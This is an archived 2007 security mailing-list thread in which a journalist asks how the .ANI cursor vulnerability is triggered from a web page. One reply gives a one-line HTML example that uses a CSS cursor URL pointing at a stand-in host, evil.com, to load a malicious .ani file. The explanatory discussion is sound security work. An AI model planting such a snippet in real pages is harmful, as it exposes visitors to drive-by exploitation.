[funsec] How do you load a .ANI from a web page?

Larry Seltzer Larry at larryseltzer.com
Sat Mar 31 16:51:05 CDT 2007


Thanks. BTW, I had also read that Firefox would be affected by this bug,
but their docs
(http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_pr
operty) specifically state that .ANI is not supported. 
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ <blocked::http://security.eweek.com/> 
http://blog.eweek.com/blogs/larry%5Fseltzer/
<http://blog.eweek.com/blogs/larry_seltzer/>
<http://blog.ziffdavis.com/seltzer> 
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com 
 

________________________________

From: avivra [mailto:avivra at gmail.com] 
Sent: Saturday, March 31, 2007 5:47 PM
To: Larry Seltzer; funsec at linuxbox.org
Subject: RE: [funsec] How do you load a .ANI from a web page?



Hi Larry,

 

A cursor css style.

e.g. <div style="cursor:url(http://evil.com/mal.ani)"></div>

 

More info can be found here:
http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml
/reference/properties/cursor.asp 

 

--Aviv.

 

From: funsec-bounces at linuxbox.org [mailto:funsec-bounces at linuxbox.org]
On Behalf Of Larry Seltzer
Sent: Sunday, April 01, 2007 12:15 AM
To: funsec at linuxbox.org
Subject: [funsec] How do you load a .ANI from a web page?

 

I keep hearing that the .ANI vulnerability can be invoked just by
viewing a web page.

 

How do you load a .ANI file from a web page?

 

Related question: I keep hearing that you can be exploited from plain
text mail. How the hell is this possible, or is it just a matter of web
links and file attachments?

 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ <blocked::http://security.eweek.com/> 
http://blog.eweek.com/blogs/larry%5Fseltzer/
<http://blog.eweek.com/blogs/larry_seltzer/> 

Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com 

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://linuxbox.org/pipermail/funsec/attachments/20070331/02ff144a/attachment.htm


More information about the funsec mailing list